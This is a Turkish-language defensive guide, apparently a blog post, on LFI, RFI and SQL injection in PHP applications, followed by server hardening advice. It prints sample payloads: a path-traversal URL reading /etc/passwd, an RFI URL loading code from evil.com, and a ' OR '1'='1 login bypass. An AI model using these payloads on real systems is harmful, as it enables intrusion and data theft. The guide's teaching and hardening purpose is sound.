<\/span><\/h2>\n\n\n\nLFI, sald\u0131rgan\u0131n hedef sistemdeki dosyalar\u0131 \u00e7a\u011f\u0131rmas\u0131na veya \u00e7al\u0131\u015ft\u0131rmas\u0131na olanak sa\u011flayan bir g\u00fcvenlik a\u00e7\u0131\u011f\u0131d\u0131r. Genellikle PHP tabanl\u0131 uygulamalarda g\u00f6r\u00fcl\u00fcr ve include<\/code>, require<\/code> gibi fonksiyonlar\u0131n kullan\u0131c\u0131 girdisiyle kontrols\u00fcz kullan\u0131lmas\u0131 durumunda ortaya \u00e7\u0131kar.<\/p>\n\n\n\n<\/span>LFI Sald\u0131r\u0131s\u0131n\u0131n Tipik Kullan\u0131m\u0131<\/span><\/h3>\n\n\n\nhttp://example.com\/page.php?file=..\/..\/..\/..\/etc\/passwd\n<\/code><\/pre>\n\n\n\n<\/span>LFI’ye Kar\u015f\u0131 Al\u0131nmas\u0131 Gereken \u00d6nlemler<\/span><\/h3>\n\n\n\n\nallow_url_include<\/code> ve allow_url_fopen<\/code> direktiflerinin devre d\u0131\u015f\u0131 b\u0131rak\u0131lmas\u0131<\/li>\n\n\n\n- Dosya dahil etme i\u015flemlerinde sabit tan\u0131mlamalar (whitelisting) kullan\u0131lmas\u0131<\/li>\n\n\n\n
- Kullan\u0131c\u0131 girdisinin sanitize ve validate edilmesi<\/li>\n\n\n\n
- PHP’de
basename()<\/code> ve realpath()<\/code> kontrollerinin entegre edilmesi<\/li>\n\n\n\n- Web sunucusu seviyesinde dosya eri\u015fim izinlerinin s\u0131n\u0131rland\u0131r\u0131lmas\u0131<\/li>\n<\/ul>\n\n\n\n
<\/span>RFI (Remote File Inclusion) Nedir?<\/span><\/h2>\n\n\n\nRFI, uzak bir kaynaktan dosya \u00e7a\u011f\u0131rmaya ve \u00e7al\u0131\u015ft\u0131rmaya olanak sa\u011flayan bir g\u00fcvenlik zafiyetidir. LFI\u2019den farkl\u0131 olarak sald\u0131rgan\u0131n kendi kontrol\u00fcndeki bir sunucudan zararl\u0131 dosya \u00e7al\u0131\u015ft\u0131rmas\u0131 m\u00fcmk\u00fcnd\u00fcr.<\/p>\n\n\n\n
<\/span>RFI Sald\u0131r\u0131s\u0131n\u0131n Tipik Kullan\u0131m\u0131<\/span><\/h3>\n\n\n\nhttp://example.com\/page.php?file=http:\/\/evil.com\/malicious.txt\n<\/code><\/pre>\n\n\n\n<\/span>RFI’ye Kar\u015f\u0131 Sunucu Tarafl\u0131 G\u00fcvenlik \u00d6nlemleri<\/span><\/h3>\n\n\n\n\nallow_url_fopen<\/code> ve allow_url_include<\/code> de\u011ferlerinin Off<\/code> yap\u0131lmas\u0131<\/li>\n\n\n\n- Sunucu taraf\u0131nda d\u0131\u015f URL\u2019lerin i\u00e7e aktar\u0131lmas\u0131n\u0131n engellenmesi<\/li>\n\n\n\n
- Dosya i\u00e7eri\u011fi i\u015flemlerinde sadece yerel path\u2019lerin kullan\u0131lmas\u0131<\/li>\n\n\n\n
- Web uygulama g\u00fcvenlik duvar\u0131 (WAF) ile \u015f\u00fcpheli URL parametrelerinin engellenmesi<\/li>\n<\/ul>\n\n\n\n
<\/span>SQL Injection Nedir?<\/span><\/h2>\n\n\n\nSQL Injection, kullan\u0131c\u0131 giri\u015fleri arac\u0131l\u0131\u011f\u0131yla SQL sorgular\u0131n\u0131n manip\u00fcle edilmesini sa\u011flar. Bu zafiyet, veritaban\u0131na do\u011frudan m\u00fcdahale ile veri \u00e7al\u0131nmas\u0131na, g\u00fcncellenmesine veya silinmesine neden olabilir.<\/p>\n\n\n\n
<\/span>SQL Injection Sald\u0131r\u0131s\u0131n\u0131n \u00d6rne\u011fi<\/span><\/h3>\n\n\n\nSELECT * FROM users WHERE username = '$user' AND password = '$pass';\n<\/code><\/pre>\n\n\n\nE\u011fer $user<\/code> de\u011feri ' OR '1'='1<\/code> \u015feklinde girilirse t\u00fcm kullan\u0131c\u0131lar listelenebilir.<\/p>\n\n\n\n<\/span>SQL Injection\u2019a Kar\u015f\u0131 Al\u0131nmas\u0131 Gereken \u00d6nlemler<\/span><\/h3>\n\n\n\n\n- Haz\u0131r SQL sorgular\u0131 yerine parametreli (prepared) sorgular kullan\u0131lmal\u0131d\u0131r<\/li>\n\n\n\n
- ORM (Object Relational Mapping) kullan\u0131m\u0131 tercih edilmelidir<\/li>\n\n\n\n
- Kullan\u0131c\u0131 girdileri hem istemci hem sunucu taraf\u0131nda do\u011frulanmal\u0131d\u0131r<\/li>\n\n\n\n
- Veritaban\u0131 kullan\u0131c\u0131lar\u0131na minimum yetki verilmelidir (\u00f6rne\u011fin sadece SELECT)<\/li>\n\n\n\n
- SQL hatalar\u0131n\u0131n kullan\u0131c\u0131ya g\u00f6sterilmesi engellenmelidir (display_errors = Off)<\/li>\n<\/ul>\n\n\n\n
<\/span>Sunucu Taraf\u0131nda Genel G\u00fcvenlik \u00d6nlemleri<\/span><\/h2>\n\n\n\n<\/span>1. Dosya ve Dizin \u0130zinleri<\/span><\/h3>\n\n\n\n\n- Web dizinlerinde yaz\u0131labilir dosya b\u0131rak\u0131lmamal\u0131<\/li>\n\n\n\n
\/var\/www\/html<\/code> gibi dizinlerde sadece okunabilir ve \u00e7al\u0131\u015ft\u0131r\u0131labilir izinler tan\u0131mlanmal\u0131<\/li>\n\n\n\nchmod<\/code>, chown<\/code> ve umask<\/code> ayarlar\u0131 d\u00fczenli kontrol edilmelidir<\/li>\n<\/ul>\n\n\n\n<\/span>2. Web Uygulama G\u00fcvenlik Duvar\u0131 (WAF)<\/span><\/h3>\n\n\n\n\n- ModSecurity gibi WAF sistemleri, bilinen LFI, RFI, SQL Injection imzalar\u0131n\u0131 tespit eder ve engeller<\/li>\n\n\n\n
- WAF ile gelen t\u00fcm HTTP istekleri analiz edilerek \u015f\u00fcpheli davran\u0131\u015flar otomatik engellenebilir<\/li>\n<\/ul>\n\n\n\n
<\/span>3. G\u00fcncellemelerin Takibi ve Yama Y\u00f6netimi<\/span><\/h3>\n\n\n\n\n- PHP, MySQL, Apache\/Nginx gibi servisler d\u00fczenli olarak g\u00fcncellenmeli<\/li>\n\n\n\n
- Yaz\u0131l\u0131m ba\u011f\u0131ml\u0131l\u0131klar\u0131nda kullan\u0131lan k\u00fct\u00fcphaneler (\u00f6rne\u011fin Composer paketleri) denetlenmelidir<\/li>\n<\/ul>\n\n\n\n
<\/span>4. Loglama ve \u0130zleme<\/span><\/h3>\n\n\n\n\n- Sunucu eri\u015fim loglar\u0131, PHP hata loglar\u0131 ve veritaban\u0131 loglar\u0131 d\u00fczenli incelenmelidir<\/li>\n\n\n\n
- \u015e\u00fcpheli URL kullan\u0131mlar\u0131, \u00e7oklu hatal\u0131 oturum a\u00e7ma giri\u015fimleri gibi olaylar alarmlanmal\u0131d\u0131r<\/li>\n<\/ul>\n\n\n\n
<\/span>5. G\u00fcvenli Kodlama Standartlar\u0131<\/span><\/h3>\n\n\n\n\n- OWASP Top 10 listesine g\u00f6re g\u00fcvenli kodlama pratikleri uygulanmal\u0131<\/li>\n\n\n\n
- Geli\u015ftiricilere periyodik g\u00fcvenlik e\u011fitimi verilmelidir<\/li>\n<\/ul>\n\n\n\n